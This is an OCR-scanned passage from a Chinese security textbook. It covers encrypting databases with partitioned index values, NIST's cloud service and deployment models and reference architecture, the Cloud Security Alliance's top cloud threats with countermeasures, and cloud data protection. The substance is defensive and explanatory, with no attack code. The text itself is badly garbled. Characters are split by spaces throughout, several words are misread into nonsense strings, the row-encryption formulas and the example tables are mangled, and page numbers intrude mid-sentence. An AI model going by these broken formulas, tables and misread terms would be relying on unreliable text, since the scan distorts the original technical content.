4. 查询 处 理 器 解密 数据 并 返回 结果 。 





图 5-9 一 种 数据 库 加 密 方案 
例如 ， 考 虑 5.1 节 基 于 图 5-4a 中 数据 库 提出 的 查询 : 


SELECT Ename, Eid, Ephone 
FROM Employee 
WHERE Did = 15 


假定 使 用 加 密 密 钥 x， 部 门 号 15 的 加 密 值 为 E(k, 15) 二 1000110111001110。 那 么 客户 端的 
查询 处 理 器 将 上 面 的 查询 变换 为 : 


SELECT Ename, Eid, Ephone 
FROM Employee 
WHERE Did = 1000110111001110 
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这 种 方法 非常 直接 ， 但 正如 前 面 提 到 的 ， 缺 乏 灵 活性 。 例 如 ， 假 设 Employee RAFAL 
属性 ， 并 且 用 户 想 要 检索 工资 少 于 $70K 的 所 有 记录 。 因 为 每 条 记录 的 工资 属性 值 都 是 加 密 
的 ， 所 以 没有 显然 的 方法 实现 这 个 要 求 。 加 密 值 的 集合 不 再 保持 原始 属性 值 的 排列 次 序 。 

为 了 提供 更 好 的 灵活 性 ， 可 以 采用 下 面 的 方法 。 将 数据 库 中 表 的 每 条 记录 ( 行 ) HAM 
密 。 参 考 图 5-3 中 关系 数据 库 的 抽象 模型 ， 可 将 每 行 R; 看 作 一 个 连续 的 块 B==(xa || x2 ll 
xmo XE, R 中 的 每 个 属性 值 不 管 是 文本 类 型 还 是 数值 类 型 都 被 看 作 比 特 序列 ， 该 行 的 所 有 
属性 值 连接 起 来 形成 一 个 二 进 制 块 。 将 整 行 加 密 ， 表 示 为 Ek, B)=E(k, (Xn xz lell xa) A 
了 支持 数据 检索 ， 每 个 表 都 与 属性 索引 关联 。 对 属性 中 的 部 分 或 全 部 ， 创 建 索引 值 。 对 于 未 加 
密 数据 库 中 的 每 行 RR:， 映 射 如 下 所 示 (图 5-10 ): 

(Xi, Xi2,°**, Xim) 一 [E(k, Bi), In, Toa,**, Iim] 
Bi=(xa || 2 | Xim) 





B; -ck lk, | 
图 5-10 图 5-3 中 数据 库 的 加 密 方案 


对 于 原始 数据 库 中 的 每 行 ， 在 加 密 后 的 数据 库 中 都 有 与 其 对 应 的 一 行 。 其 中 的 索引 值 用 来 
提供 对 数据 检索 的 支持 。 我 们 可 以 按 如 下 方式 操作 。 对 于 每 个 属性 ， 将 属性 值 域 分 为 一 组 不 重 
至 并 包括 所 有 可 能 值 的 分 块 ， 并 给 每 个 分 块 指派 一 个 索引 值 。 

K 5-3 给 出 了 这 种 映射 的 一 个 实例 。 假 设 职工 ID (eid) 的 取 值 范围 为 [1, 1000]。 我 们 将 这 
些 值 划分 为 5 个 分 块 : [1, 200]、[201, 400], [401, 600], [601, 800] 和 [801, 1000]， 然 后 分 别 指 
派 索引 值 1、2、3、4 和 5。 对 于 文本 字段 ， 可 以 从 属性 值 的 首 字母 得 出 索引 。 例 如 对 于 属性 
ename， 我 们 可 以 规定 以 A 或 B 开头 的 值 的 索引 为 1， 以 C 或 D 开头 的 值 的 索引 为 2， 依 此 类 
推 。 对 每 个 属性 采用 类 似 的 划分 方案 。 表 5-3b 给 出 了 结果 表 。 第 一 列 中 的 值 表 示 每 行 的 加 密 
值 ， 其 实际 值 依赖 于 加 密 算法 和 加 密 密 钥 。 剩 余 列 给 出 相应 属性 值 的 索引 值 。 属 性 值 与 索引 值 
之 间 的 映射 函数 构成 了 元 数据 ， 存 储 在 客户 端 和 数据 主 处 ， 而 不 存储 在 服务 器 端 。 


表 5-3 加密 数 据 库 举例 

a) Employee 表 
eid 
23 
860 
320 
875 


1100110011001011… 


omomoi: | s | 7 | > | 7 | 
2 


1100010010001101: 
0011010011111101--- 


EW | We) | oname) | iaa | 1ean | read 
DE ase TES i R 
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这 种 安排 提供 了 更 高 效 的 数据 检索 。 例 如 ， 假 设 一 个 用 户 请 求 eid<300 的 所 有 职工 的 记 
录 。 查 询 处 理 器 请 求 所 有 I(eid) 和 2 的 记录 。 服 务 器 返回 这 些 记 录 。 查 询 处 理 器 解密 返回 的 所 
有 行 ， 丢 弃 不 匹配 原始 查询 的 记录 ， 将 被 请 求 的 未 加 密 数据 返回 给 用 户 。 

刚才 描述 的 索引 方案 恰好 给 攻击 者 提供 了 一 定数 量 的 信息 ， 就 是 按 指定 属性 排列 的 行 的 
大 致 相对 次 序 。 为 了 隐藏 这 些 信 息 ， 可 以 将 索引 的 次 序 随机 排列 。 例 如 ，eid 的 值 可 以 通过 将 
[1, 200]、[201, 400]、[401, 600] 、[601, 800] 和 [801, 1000] 分 别 映射 到 2、3、5、1 和 4 来 划分 。 
因为 元 数据 并 未 存储 在 服务 器 端 ， 所 以 攻击 者 不 能 从 服务 器 获得 这 些 信 息 。 

还 可 以 将 其 他 特征 加 到 这 个 方案 中 。 为 了 提高 通过 主键 访问 记录 的 效率 ， 系 统 可 以 使 用 主 
键 属性 值 的 加 密 值 ， 或 散 列 值 。 在 任 一 种 情况 下 ， 对 应 主键 值 的 行 都 可 以 被 单独 检索 。 数 据 库 
的 不 同 部 分 可 以 用 不 同 的 密 钥 加 密 ， 因 此 用 户 只 能 访问 其 拥有 解密 密 钥 的 那 一 部 分 。 后 一 种 方 
案 可 以 与 基于 角色 的 访问 控制 系统 结合 起 来 使 用 。 


5.8 云 计算 


近年 来 ， 越 来 越 多 的 组 织 或 机 构 倾向 于 将 其 主要 的 甚至 全 部 的 信息 技术 操作 转移 到 与 
Internet 连接 的 基础 设施 上 ， 即 企业 级 云 计 算 ， 此 可 谓 大 势 所 趋 。 然 而 ， 使 用 云 计 算 会 引发 一 
些 安全 问题 ， 尤 其 是 在 数据 库 安 全 方面 。 本 节 对 云 计 算 进 行 了 综述 ， 而 5.9 节 主 要 讨论 云 计 算 
安全 问题 。 


5.8.1 云 计算 要 素 
NIST SP-800-145(《 NIST 云 计算 定义 》) 以 如 下 形式 定义 了 云 计 算 : 


云 计算 : 云 计算 是 一 种 可 提供 普 适 的 、 便 捷 的 、 按 需 的 网 络 访问 以 进入 可 配置 的 资源 共享 
池 ( 如 网 络 、 服 务 器 、 存 储 器 、 应 用 和 服务 ) 的 模型 ， 而 且 只 需 投入 很 少 的 管理 工作 或 与 


服务 提供 商 进行 很 少 的 交互 ， 这些 资源 就 可 以 被 迅速 地 供应 释放。 该 云 模 型 由 五 种 基本 
特征 、 三 种 服务 模型 及 四 种 部 署 模型 组 成 ， 提 高 了 资源 的 可 用 性 。 





该 定义 涉及 了 多 种 模型 和 特征 ， 它 们 间 的 关系 如 图 5-11 所 示 。 而 云 计算 的 基本 特征 包括 : 

e 广泛 的 网 络 接 入 : 云 计算 的 功能 在 网 络 中 可 用 ， 且 其 像 其 他 的 传统 或 云端 的 软件 服务 
一 样 ， 可 通过 改进 过 的 标准 机 制 被 各 种 轻 客户 端 平台 (例如 移动 电话 、 笔 记 本 电脑 以 
及 PDA) 使 用 。 

e 快速 的 弹性 : 云 计 算 赋 予 用 户 根据 自己 的 特定 服务 需求 来 延展 和 缩减 资源 的 能 力 。 例 
如 ， 用 户 可 以 在 执行 一 项 特定 任务 的 时 期 占有 大 量 的 服务 器 资源 ， 并 在 完成 该 任务 后 
将 资源 释放 。 

e 可 测量 的 服务 : 通过 评估 自身 系统 的 处 理 能 力 ， 云 系统 能 够 根据 服务 类 型 (例如 存储 
器 、 处 理 器 、 带 宽 以 及 活跃 着 的 用 户 账户 ) 自发 地 对 资源 进行 相应 程度 的 控制 和 优化 。 
鉴于 服务 的 透明 特性 ， 对 提供 者 和 消费 者 而 言 ， 资 源 的 使 用 情况 可 以 随时 被 监测 、 控 
制 和 公布 。 

e 按 需 自 服务 : 一 旦 需求 ， 消 费 者 即 可 单 向 地 提供 计算 能 力 (例如 服务 时 间 和 网 络 存储 
器 )， 而 无 须 与 其 他 服务 提供 者 进行 人 为 交互 。 这 是 由 于 服务 本 身 是 自助 的 ， 资 源 并 非 
ERAK IT 基础 设施 中 永久 的 一 部 分 。 

e 资源 池 化 : 与 多 租 客 模型 类 似 ， 根 据 消 费 者 的 不 同 需求 ， 提 供 者 动态 地 分 配 和 重 分 配 
不 同 物理 和 虚拟 资源 ， 动 态 地 将 其 计算 资源 一 同 提供 给 多 个 消费 者 。 资 源 的 位 置 具有 
一 定 的 独立 性 ， 即 消费 者 一 般 无 法 控制 并 无 从 得 知 其 所 得 的 资源 的 确切 来 源 ， 但 是 可 


BSF RBASEEH 127 


能 知晓 大 体 的 位 置 (例如 国家 、 行 政 区 或 数据 中 心 )。 上 述 资源 包括 存储 器 、 处 理 器 、 
内 存 、 网 络 带 宽 以 及 虚拟 机 。 另 外 ， 私 有 云 倾向 于 将 同一 机 构 或 组 织 的 不 同 部 分 之 间 
的 资源 整合 起 来 。 


软件 即 服务 ( SaaS ) 
台 即 服务 (PaaS) 


基本 特征 





基础 设施 即 服务 〈 IaaS ) 


服务 模型 





部 署 模型 





图 5-11 云 计算 要 素 


NIST 定义 了 三 种 服务 模型 ， 可 被 看 作 艇 套 的 可 选 服务 方案 (图 5-12): 


软件 即 服务 (SaaS): 以 软件 特别 是 应 用 程序 的 形式 将 服务 提供 给 消费 者 ， 可 接 入 且 运 
行 在 云端 。SaaS 遵循 通常 的 Web 服务 模型 ， 因 而 适用 于 云端 资源 。SaaS 允许 消费 者 
在 提供 者 的 云端 基础 设施 上 运行 提供 者 的 应 用 程序 。 应 用 程序 可 被 各 种 客户 端 设备 通 
过 简单 接口 (例如 Web 浏览 器 ) 进行 访问 。 有 别 于 传统 方式 ， 企 业 能 够 从 云端 服务 中 
获取 桌面 和 桌面 软件 产品 的 服务 器 许可 证 ， 而 传统 的 方式 是 用 户 需 要 通过 软件 提供 者 
获取 许可 证 。SaaS 降低 了 软件 安装 、 维 护 、 升 级 以 及 打 补 丁 的 复杂 性 。 类 似 的 例子 包 
括 Gmall、Google 的 E-mail 服务 以 及 Salesforce.com 等 ， 这 些 服务 都 有 助 于 公司 实时 
追踪 其 消费 者 。 

平台 即 服务 ( PaaS) : 以 平台 的 形式 将 服务 提供 给 消费 者 ， 消 费 者 的 应 用 程序 可 以 运 
行 在 该 平台 上 。PaaS 允许 消费 者 在 云端 基础 设施 上 部 署 自己 创建 或 获取 的 应 用 程序 。 
PaaS 云 提供 了 有 用 的 软件 构建 组 件 和 一 些 开发 工具 ， 例 如 程序 语言 、 运 行 环境 以 及 
其 他 用 于 部 署 的 辅助 工具 。 事 实 上 ，Paas 是 一 个 开放 的 云端 系统 。 当 根据 且 仅 根据 
所 需 而 购买 计算 资源 时 ，PaaS 对 和 欲 开 发 新 的 或 定制 的 应 用 程序 的 企业 而 言 非常 有 用 。 
Google App Engine 和 Salesforce.com 的 Salesforcel 平台 就 是 PaaS 的 典型 例子 。 

基础 设施 即 服务 (laas): 准许 消费 者 访问 底层 的 云端 基础 设施 。IaaS 提供 虚拟 机 和 
其 他 抽象 硬件 及 操作 系统 ， 这 些 资源 可 通过 应 用 程序 接口 (Application Programming 
Interface, API) 来 进行 控制 。IaaS 被 提供 给 消费 者 处 理 器 、 存 储 器 、 网 络 以 及 其 他 
基础 计算 资源 ， 以 便 消 费 者 能 够 部 署 和 运行 任意 的 软件 ， 例 如 操作 系统 和 应 用 程序 。 
laas 允许 消费 者 组 合 基 本 计算 服务 (例如 数据 处 理 和 数据 存储 )， 以 构建 更 具 适 用 性 
的 系统 。Amazon Elastic Compute Cloud ( Amazon EC2 ) 和 Windows Azure 就 是 laaS 
的 典型 例子 。 
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云 应 用 软件 
(由 用 户 开发 ) 
云 平台 
(对 用 户 可 见 ) 





a) 软件 即 服务 (SaaS ) b) 平台 即 服务 (PaaS ) c) 基础 设施 即 服务 ( IaaS ) 
图 5-12 云 服务 模型 


NIST 定义 了 四 种 部 署 模型 . 
© RAS: 公有 云 的 基础 设施 一 般 由 销售 云 服 务 的 组 织 或 机 构 拥 有 ， 供 社会 大 众 或 大 型 
183 工业 群体 使 用 。 云 提供 者 需 对 云端 基础 设施 以 及 云端 数据 的 操控 负责 。 
e 私有 云 : 私有 云 的 基础 设施 仅仅 能 被 某 机 构 使 用 。 它 由 该 机 构 或 第 三 方 管 理 ， 并 可 以 
在 内 部 部 署 或 者 在 外 部 部 署 。 云 提供 者 仅 需 对 基础 设施 负责 ， 而 无 须 对 其 控制 负责 。 
e 社区 云 : 社区 云 的 基础 设施 由 若干 机 构 共 享 ， 以 供 具有 共同 特点 的 特定 团体 (例如 任 
务 、 安 全 设备 、 政 策 法 规 以 及 其 他 合 
KAR) 使 用 。 它 由 该 机 构 或 第 三 方 
管理 ， 并 可 以 在 内 部 部 署 或 者 在 外 部 
部 署 。 
e RAZ: 混合 云 的 基础 设施 由 两 种 或 更 
多 种 云 组 成 。 各 组 成 部 分 依然 是 独立 的 
实体 ， 但 是 通过 标准 化 或 专 有 化 技术 被 
组 合 在 一 起 以 确保 数据 和 应 用 程序 的 运 
转 〈 例 如 云 爆发 部 署 模式 可 以 处 理 混合 
云 中 的 负载 平衡 )。 
图 5-13 描绘 了 典型 的 云 服 务 情境 。 一 个 企 
业 维 持 了 若干 个 位 于 其 内 部 局 域 网 的 工作 站 ， 
184] 而 局 域 网 与 一 个 路 由 器 连接 ， 通 过 外 部 网 或 
Internet 网 接 入 云 服务 提供 者 。 云 服务 提供 者 
维护 了 大 量 的 服务 器 ， 以 便 该 提供 者 可 以 管理 
各 种 网 络 事务 、 宛 余 以 及 安全 工具 。 在 图 5-13 
中 ， 云 基础 设施 由 一 系列 具有 共同 结构 的 刀片 -g 
服务 器 表示 ， 这 是 一 个 基本 架构 。 图 5-13 云 计算 情境 


5.8.2 云 计算 参考 架构 
NIST SP-500-292 (《 NIST 云 计算 参考 架构 》) 构建 了 一 种 参考 架构 ， 描 述 如 下 : 


NIST 云 计算 参考 架构 的 重点 在 于 提供 “什么 样 ”的 云 服务 ， 而 非 “ 如 何 ” 提 出 解决 
方案 和 给 出 具体 实现 。 该 参考 架构 有 助 于 理解 云 计算 实际 操作 中 的 复杂 事务 。 它 并 非 一 种 





特定 云 计 算 系 统 的 结构 示例 ， 而 是 一 种 利用 通用 架构 ， 描 述 、 探 讨 和 开发 特定 系统 结构 的 
工具 。 
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NIST 开发 了 具有 以 下 预期 目标 的 参考 架构 : 

© 描绘 并 理解 在 云 计算 概念 模型 场景 中 的 各 种 云 服务 。 

e 提供 一 个 有 助 于 消费 者 理解 、 探 讨 、 分 类 和 比较 云 服 务 的 技术 性 参考 。 

o 便于 分 析 各 方面 的 候选 标准 ， 包 括 安全 性 、 互 操作 性 、 可 移植 性 以 及 参考 实现 。 

如 图 5-14 所 示 ， 该 参考 架构 依据 作用 和 职责 ， 定 义 了 五 种 主要 的 角色 : 

© 云 消费 者 : 与 云 提供 者 保持 商业 往来 或 使 用 云 提供 者 服务 的 个 人 或 组 织 。 

云 提 供 者 (Cloud Provider, CP): 负责 向 有 关 当 事 人 提供 云 服务 的 个 人 、 机 构 或 实体 。 
云 审 计 者 : 对 云 服务 、 信 息 系 统 操 作 、 性 能 以 及 云 实现 的 安全 性 进行 独立 评估 的 团体 。 
云 经 纪 人 : 解决 云 服 务 的 使 用 、 性 能 和 分 配 问 题 的 实体 ， 且 可 调配 云 消费 者 和 云 提 供 
者 之 间 的 关系 。 

云 运营 商 : 提供 云 服 务 连 接 和 传输 的 媒介 ， 该 服务 由 云 提供 者 到 云 消费 者 。 





图 $-14 NIST 云 计算 参考 结构 


云 消费 者 和 云 提供 者 的 作用 在 之 前 已 讨论 过 了 。 总 而 言 之 ， 云 提供 者 可 以 提供 一 种 或 多 种 
云 服务 ， 以 满足 云 消 费 者 的 IT 或 商业 和 需求。 对 于 每 种 服务 模型 (SaaS, Paas 和 IaaS)， 云 提供 
者 都 提供 了 相应 的 存储 和 处 理 设备 ， 以 及 供 云 服务 消费 者 使 用 的 云 接口 。 在 Saas 中 ， 云 提供 
者 在 云端 基础 设施 上 部 署 、 配 置 、 维 护 以 及 升级 软件 应 用 ， 以 便服 务 以 预期 效果 被 提供 给 云 消 
费 者 。SaaS 的 消费 者 可 以 是 组 织 ， 该 组 织 为 其 成 员 设 置 软件 应 用 的 准 和 人 制度 ; 也 可 以 是 直接 
使 用 软件 应 用 的 某 终端 用 户 ; 抑或 是 为 终端 用 户 配 置 应 用 的 管理 员 。 

在 Paas 中 ， 云 提供 者 管理 用 于 搭载 平台 的 计算 基础 设施 ， 并 运行 用 于 支持 平台 组 件 的 云 
端 软 件 ， 例 如 软件 执行 栈 、 数 据 库 以 及 其 他 中 间 组 件 。Paas 的 云 消费 者 可 以 向 云 提供 者 租用 
工具 和 执行 资源 ， 以 开发 、 测 试 、 部 署 和 管理 位 于 云 环境 中 的 应 用 程序 。 

在 las 中 ， 云 提供 者 获取 服务 底层 的 物理 计算 资源 ， 包 括 服务 器 、 网 络 、 存 储 器 以 及 主 
机 基础 设施 ， 以 供 基础 计算 所 需 ，IaaS 的 云 消费 者 依次 使 用 这 些 计算 资源 (如 虚拟 机 )。 

云 运营 商 是 用 于 在 云 消费 者 和 云 提供 者 之 间 传 输 和 连接 云 服务 的 网 络 设 施 。 通 常 云 提供 者 
会 与 云 载体 签订 服务 级 合约 (Service Level Agreement, SLA) 以 向 云 消费 者 提供 相应 的 服务 ， 
并 可 请 求 云 运营 商 提供 服务 所 需 的 可 靠 安全 的 连接 。 

当 云 服务 对 于 云 消 费 者 而 言 过 于 复杂 时 ， 云 经 纪 人 可 有 效 将 之 简化 处 理 。 云 经 纪 人 可 以 提 
供 以 下 三 方面 的 支持 : 
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服务 中 介 : 这 是 增值 服务 ， 例 如 身份 管理 、 性 能 报告 以 及 提升 安全 性 。 

服务 聚合 : 经 纪 人 汇集 多 种 云 服务 以 满足 云 消费 者 的 需求 ， 服 务 并 非 来 自 单一 的 云 提 
供 者 。 另 外 ， 经 纪 人 还 可 以 优化 服务 性 能 和 节省 支付 费用 。 

服务 套利 : 服务 套利 类 似 服 务 汇 总 ， 但 是 有 一 点 不 同 ， 即 汇总 的 服务 并 不 是 机 械 化 的 。 
服务 套利 即 经 纪 人 可 以 灵活 地 在 多 个 代理 机 构 之 间 选 择 服 务 。 例 如 ， 经 纪 人 可 以 利用 
信用 评分 服务 以 挑选 评分 最 高 的 代理 机 构 。 


云 审计 者 可 以 从 安全 控制 、 隐 私 影响 以 及 性 能 等 多 个 方面 对 云 提供 者 提供 的 服务 做 出 评 
估 。 云 审计 者 是 一 个 独立 的 实体 ， 以 确保 云 提供 者 符合 一 系列 的 标准 。 


5.9 云 安全 风险 及 应 对 措施 


总 体 来 说 ， 云 计算 中 的 安全 性 控制 与 其 他 IT 环境 中 的 安全 性 控制 类 似 。 尽 管 如 此 ， 鉴 于 
操作 模式 与 开发 技术 被 用 于 提供 云 服 务 ， 云 计算 依然 会 承担 与 云 相关 的 风险 。 这 里 我 们 必须 要 
注意 ， 企 业 尽管 失去 了 对 资源 、 服 务 和 应 用 的 主要 控制 权 ， 但 仍然 必须 保证 安全 性 和 隐私 性 的 


原则 


o 


云 安 全 联盟 (Cloud Security Alliance) [CSA10] 列 出 了 首要 的 几 种 云 安全 威胁 ， 如 下 
所 述 : 


滥用 和 恶意 地 使 用 云 计 算 : 对 于 许多 云 提 供 者 而 言 ， 申 请 并 使 用 其 云 服务 相对 容易 ， 
甚至 在 有 限 的 试用 期 内 云 服 务 是 免费 的 。 这 便 令 攻击 者 有 机 会 接 人 云端 进行 多 种 攻击 ， 
例如 垃圾 邮件 、 亚 意 代码 攻击 和 拒绝 服务 攻击 。 一 直 以 来 ，Paas 提供 商 受到 的 此 类 攻 
GRE. RM, REAM, laas 提供 商 同样 成 了 黑客 的 攻击 目标 。 抵 御 诸 如 此 类 
攻击 对 于 云 提 供 商 而 言 无 疑 是 一 种 负担 ,但 是 云 服 务 客户 端 依然 要 监管 其 涉及 数据 
和 资源 的 操作 ， 以 检测 出 恶意 行为 。 应 对 措施 包括 : (1) 更 严格 的 申请 和 审批 步骤 ; 
(2) 加 大 信用 卡其 诈 的 检测 力度 ; (3 ) 广泛 掌控 客户 的 网 络 流量 ; (4) 检测 公共 黑 名 
单 中 个 人 的 网 络 分 组 。 

不 安全 的 接口 与 应 用 程序 接口 (API) : 云 提供 者 会 发 布 一 系列 的 软件 接口 和 API， 以 便 
消费 者 能 够 处 理 云 服 务 并 与 之 交互 。 一 般 的 云 服 务 的 安全 性 和 可 用 性 与 这 些 基 础 API 
相互 独立 。 从 认证 和 访问 控制 加 密 以 及 行为 监控 的 角度 来 看 ， 这 些 接口 必须 能 够 预防 
意外 事故 和 恶意 企图 。 应 对 措施 包括 : (1) 分 析 云 提供 者 接口 的 安全 模型 ; ( 2 ) 确保 
实现 健壮 的 认证 和 访问 控制 ， 并 配 有 相应 的 加 密 传输 方式 ; (3 ) 理解 API 之 间 的 依赖 
关系 。 

恶意 的 内 部 人 员 : 在 云 计 算 的 范例 中 ， 组 织 放 弃 了 对 大 部 分 安全 性 的 直接 控制 ， 这 
样 就 赋予 了 云 提 供 者 前 所 未 有 的 信任 。 因 而 由 恶意 内 部 人 员 的 行为 产生 的 风险 就 非 
常 值 得 关注 。 云 的 结构 导致 了 如 此 极度 高 风险 的 角色 的 存在 ， 此 类 角色 诸如 云 提供 
者 系统 管理 员 和 安全 服务 提供 商 。 应 对 措施 包括 : (1) 从 严 把 关 供 应 链 的 管理 ， 对 
云 提供 者 进行 综合 评估 ; (2 ) 将 人 力 资 源 需 求 作 为 法 律 合同 的 一 部 分 ; (3 ) 要 求 信 
息 安 全 和 管理 运作 的 整体 透明 性 ， 与 合 规 报 告 承诺 的 一 致 ; (4 ) 制定 安全 性 违约 声 
明 程序 。 

技术 共享 问题 : IaaS 服务 提供 商 通过 可 扩展 的 方式 共享 其 基础 设施 ， 来 提供 其 服务 。 
通常 ， 构 成 这 种 基础 设施 (如 CPU 缓存 和 GPU 等 ) 的 底层 组 件 并 非 用 于 加 强 多 租户 结 
构 的 隔离 特性 。 云 提供 者 一 般 的 处 理 方式 是 给 单独 客户 端 提供 独立 的 虚拟 机 。 这 个 处 
理 方法 依然 容易 招致 内 部 和 外 部 人 员 的 攻击 ， 而 且 该 方法 仅仅 可 被 作为 总 体 安全 策略 
的 一 部 分 。 应 对 措施 包括 :( 1 ) 给 予 安装 和 配置 行为 最 好 的 安全 性 实现 ; (2) 监督 未 
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授权 变更 与 行为 的 执行 环境 ; (3 ) 对 行政 接 人 和 操作 加 强 认 证 和 访问 控制 ; (4 ) 在 补 
丁 和 漏洞 修复 方面 强化 SLA; (5) 进行 漏洞 扫描 和 配置 审计 。 
数据 丢失 与 泄露 : 对 于 许多 客户 端 而 言 ， 由 安全 违约 招致 的 最 致命 的 冲击 是 数据 丢失 
与 泄露 。 我 们 将 在 下 一 节 中 讨论 这 个 问题 。 应 对 措施 包括 :( 1 ) 实现 健壮 的 API 访问 
控制 ; (2) 在 传输 中 对 数据 加 密 并 保护 其 完整 性 ; (3) 分 析 数 据 保 护 模块 的 设计 和 执 
47; (4) 实现 健壮 的 密 钥 生成 、 存 储 、 管 理 和 销毁 。 
账户 或 服务 劫持 : 由 证 书 丢失 造成 的 账户 和 服务 码 持 往往 是 最 大 的 威胁 。 通 过 窃取 证 
书 ， 攻 击 者 经 常 可 以 访问 部 署 云 计 算 服 务 的 关键 区 域 ， 以 破坏 服务 的 机 密 性 、 完 整 性 
和 可 用 性 。 应 对 措施 包括 :( 1 ) 禁止 在 用 户 和 服务 之 间 共 享 账户 证 书 ; (2) 权衡 可 能 
的 双 因 子 认证 技术 ;(3 ) 采取 积极 主动 的 监控 措施 ， 以 检测 未 授权 的 行为 ; (4 ) 理解 
云 提供 者 安全 策略 和 SLA 
未 知 的 风险 状况 : 在 使 用 云端 基础 设施 时 ， 客 户 端 有 必要 将 一 些 安全 性 组 件 的 控制 权 
交付 给 云 提供 者 。 这 样 ， 客 户 端 必须 关注 并 明确 定义 在 处 理 风险 时 的 各 种 角色 和 职责 。 
例如 ， 在 没有 观察 隐私 性 、 安 全 性 和 监督 的 基本 策略 和 流程 的 情况 下 ， 云 提供 者 的 
雇员 可 以 部 署 应 用 程序 和 数据 资源 。 应 对 措施 包括 : (1) 公开 适当 的 日 志和 数据 ; 
(2) 部 分 或 完全 公开 基础 设施 细则 (例如 完善 程度 和 防火 墙 ) ; (3 ) 对 必要 的 信息 进行 
监控 和 警告 。 

欧洲 网 络 与 信息 安全 委员 会 ( European Network and Information Security Agency) [ENIS09] 
和 NIST[JANS11] 现 已 开发 了 类 似 的 威胁 及 其 对 策 的 列表 。 


5.10 云 中 的 数据 保护 


在 前 一 节 中 ， 我 们 已 经 对 云 的 各 方面 的 安全 风险 进行 了 讨论 ， 并 给 出 了 相应 的 应 对 措施 。 
在 NIST 云 安 全 指南 ( SP-800-14 ) 中 有 一 个 进一步 的 例子 ， 如 表 5-4 所 示 ， 而 此 类 云 安全 的 话 
题 已 经 超出 了 本 章 的 范围 。 在 本 节 中 ， 我 们 主要 关注 云 安全 中 的 一 个 特定 要 素 。 

有 许多 方法 可 以 导致 数据 被 破坏 ， 在 未 备份 原始 内 容 的 情况 下 删除 和 变更 记录 就 是 一 个 很 
好 的 例子 。 在 不 可 靠 的 介质 上 ， 将 一 部 分 记录 从 巨大 的 文本 中 移 除 可 能 导致 其 无 法 恢复 ， 而 编 
码 密 钥 缺失 也 可 能 导致 不 可 道 的 损毁 。 另 外 ， 必 须 阻 止 未 经 授权 的 团体 访问 敏感 数据 。 

由 云 中 数据 破坏 而 造成 的 威胁 逐渐 增加 ， 这 是 因为 云 特有 的 或 由 云 环境 结构 和 操作 角色 导 
致 的 风险 和 挑战 逐渐 增多 。 

云 计算 中 使 用 的 数据 库 环境 较 之 一 般 的 数据 库 环境 有 较 大 的 变化 。 一 些 提 供 者 支持 多 实例 
模型 ( multi-instance model)， 为 每 个 云 用 户 提供 一 个 运行 在 虚拟 机 实例 上 的 独 有 DBMS。 这 使 
得 用 户 可 以 全 权 控 制 角色 定义 、 用 户 授权 以 及 其 他 与 安全 有 关 的 管理 工作 。 其 他 提供 者 支持 多 
租户 模型 (multi-tenant model)， 一 般 通 过 在 认证 后 附加 数据 标签 的 方式 ， 为 云 用 户 提 供 了 与 其 
他 租户 共享 的 预定 义 环境 。 附 加 标签 可 以 避免 用 户 直 接 使 用 实例 ， 但 是 其 依赖 于 云 提 供 者 建立 
并 维持 一 个 充分 安全 的 数据 库 环 境 。 

必须 在 数据 空闲 、 传 输 和 使 用 时 均 确 保 其 安全 ， 而 且 数 据 的 访问 必须 被 控制 。 客 户 端 可 以 
通过 加 密 的 方法 在 传输 时 保护 数据 ， 尽 管 这 样 做 会 涉及 云 提供 者 对 密 钥 管理 的 问题 。 客 户 端 可 
以 加 强 访 问 控制 技术 ， 但 是 这 依赖 于 云 提 供 者 使 用 的 服务 模型 。 

对 于 空闲 的 数据 而 言 ， 理 想 的 安全 措施 即 客户 端 加 密 数据 库 且 仅 在 云端 存储 数据 密 文 ， 而 
云 提 供 者 无 权 获 取 加 密 密 钥 。 尽 管 其 他 类 似 拒 绝 服务 攻击 的 风险 依然 存在 ， 但 是 只 要 密 钥 不 泄 
露 ， 云 提供 者 便 无 法 读 取 这 些 数据 。 图 5-9 描绘 了 此 模型 在 云 数据 存储 中 的 工作 情形 。 


132 B-RA HHEMEARKSRE 


R5-4 NIST 关于 云 安 全 和 隐私 问题 的 指导 和 推荐 

治理 

拓展 组 织 的 有 关 政 策 、 过 程 和 标准 的 业务 ， 该 业务 用 于 云端 应 用 开发 和 服务 供应 ， 并 涉及 设计 、 实 现 、 测 试 、 
使 用 以 及 部 署 监控 等 多 个 方面 。 

实现 审计 机 制 和 工具 以 确保 组 织 业务 在 系统 的 整个 生命 周期 中 都 可 以 使 用 。 
合 规 

理解 各 种 各 类 法 律 和 法 规 赋予 组 织 的 安全 性 和 隐私 性 保护 的 义务 和 可 能 的 影响 云 计算 的 一 些 计划 ， 尤 其 是 涉及 
数据 存放 、 隐 私 性 和 安全 性 控制 、 记 录 管 理 以 及 电子 取证 需求 的 条 目 。 


综合 评估 云 提供 者 提供 的 服务 是 否 满足 组 织 的 需求 ， 以 确保 需求 合同 能 够 被 充分 执行 。 确 保 云 提供 者 的 电子 取 
证 能 力 和 过 程 不 会 有 损 数据 和 应 用 的 安全 性 和 隐私 性 。 


信任 


确保 提供 的 服务 中 有 足够 多 的 方法 使 得 云 提供 者 进行 的 安全 性 和 隐私 性 的 控制 及 其 流程 全 程 可 见 。 
建立 清晰 且 专用 的 数据 所 有 权 。 


创立 风险 管理 程序 ， 使 之 可 以 在 系统 的 生命 周期 中 持续 、 灵 活 地 应 对 来 自 各 方面 的 风险 。 
连续 地 监控 信息 系统 的 安全 状态 以 支持 持续 的 风险 管理 决策 。 


结构 


理解 云 提供 者 用 于 提供 服务 的 基础 技术 ， 包 括 蕴含 在 系统 整个 生命 周期 中 和 涉及 系统 各 个 组 件 的 安全 性 和 隐私 
性 的 控制 技术 。 


身份 和 访问 管理 

通过 实现 适用 于 组 织 的 安全 认证 、 授 权 以 及 其 他 身份 和 访问 管理 功能 ， 以 达到 充分 的 安全 保障 。 
软件 隔离 

理解 云 提供 者 在 多 租户 软件 结构 中 使 用 的 虚拟 化 和 其 他 逻辑 隔离 技术 ， 并 评估 机 构 涉及 的 风险 。 
数据 保护 


评估 云 提供 者 的 数据 管理 措施 的 合理 性 。 该 措施 与 组 织 数 据 相关 ， 并 涉及 数据 访问 控制 ， 包 括 一 般 数 据 ， 空 
闲 、 传 输 和 使 用 中 的 安全 数据 ， 以 及 过 滤 数 据 。 


考虑 整理 与 其 他 组 织 相关 的 数据 的 风险 ， 这 些 组 织 或 是 档案 的 威胁 程度 高 或 是 拥有 价值 重大 的 数据 。 
彻底 深化 理解 有 关 云 环境 设施 及 其 建立 过 程 的 密 钥 管理 的 风险 。 


可 用 性 


